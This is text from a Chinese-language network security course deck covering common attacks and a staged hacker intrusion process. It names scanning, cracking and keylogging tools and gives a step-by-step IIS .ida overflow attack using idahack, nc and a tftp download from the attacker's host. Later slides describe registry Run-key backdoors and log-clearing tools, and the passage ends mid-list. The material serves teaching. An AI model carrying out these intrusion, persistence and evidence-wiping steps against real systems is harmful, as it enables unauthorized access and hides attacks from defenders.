网路安全概论.pptVIP

網路安全概論 Agenda 內容大綱 資訊安全概論 防火牆 IDS,IPS 基本網路障礙排除 無線網路安全 QA 資訊安全概論 常見的攻擊行為 病毒與蠕蟲(Worm)攻擊 後門程式與特洛伊木馬 IP Spoofing(IP偽造) DOS,DDOS(阻斷攻擊) 駭客入侵流程分析 駭客入侵九大步驟 入侵防治 常見攻擊行為(1) Virus Worm 攻擊 CodeRed,Nimda, SQL Slammer Blaster Backdoor Trojan 惡意網頁popup程式 病毒郵件 peep.exe peepbrowser.exe win.ini、system.ini、系統服務、registry 常見攻擊行為(2) IP spoofing–IP假造攻擊 mendas ipspoof hunt DOS DDOS 拒絕服務攻擊 SYN Flood DDOS攻擊示意圖 駭客入侵流程分析 資料蒐集 目標掃描 弱點刺探 取得初步權限 提昇權限 1.資料蒐集:找出可供入侵的資源 網頁拜訪 Whois InterNIC TWNIC(/) NetworkSolutions 社交工程 DNS zone transfer nslookup traceroute or tracert 2.目標掃描 Tools Ping Nmap SuperScan Advanced ip scanner Advanced port scanner Icmpenum NetScan Tool Pro 2000 Netcat Strobe 3.弱點刺探 網路資源與分享 Net view, nbtstat, nbtscan, nltest, Legion,… 使用者與群組探查 nbtscan nbtstat, enum 遠端登入程式 telnet,vnc,terminal service,pcanywhere 收集資訊目的 偵測目的網路的所有主機 偵測目的所提供服務 判斷目的主機服務種類(banner grabbing) 判斷目的主機之作業系統 (OS guessing) DNS區域資料 Windows 網域之NetBIOS名稱及DC Windows相關資料，如user、group、網卡數量、通訊協定。 4.進行滲透：取得初步權限 密碼猜測 不安全的密碼 NTIS(空白密碼) administrator, adm , test…. 字典攻擊法 SMBCrack Legion, NetBIOS Audition Tool,… 網路監聽 cain 緩衝區溢位(Buffer Overflow)攻擊 IIS 緩衝區溢位(Buffer Overflow)攻擊 IIS ida溢出漏洞的攻擊 工具：tftpd32, idahack, nc, whoami 步驟： Start tftpd32 進入命令提示字元模式，並切換至idahack所在目錄 輸入 “ idahack 欲攻擊目標IP 欲攻擊目標之IIS port 欲攻擊目標OS version代碼 欲開啟之連接port Nc 欲攻擊目標IP 由idahack所開啟之port Ipconfig /all /* 確認攻擊成功 */ Cd \ Tftp –I 發動攻擊HOST 之IP get whoami.exe Whoami /* 確認目前的使用者帳號 */ 5. 提昇權限 密碼猜測 網路監聽 密碼檔破解工具 Tools: pwdump2, L0phtCrack, John 將使用者加入管理者群組 getadmin, Sechole 鍵盤敲擊記錄 Keylogger To find Protected Storage Service including passwords for e-mail accounts in Microsoft Outlook, Microsoft Outlook Express, MSN Messenger, saved Internet Explorer form data . Protected Storage Explorer Protected storage passview 6.進行破壞 竊取破壞 置換網頁 刪除資料 跳板攻擊 攻擊知名企業或政府單位 7.建立後門 啟動的操控 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion, \Run, \RunOnce, \RunOnceEx, \RunServices 遠端控制 Telnet service VNC,Terminal services,pcanywhere 8.隱藏蹤跡、消滅證據 關閉稽核 清除記錄 Elsave, ClearLogs, Clear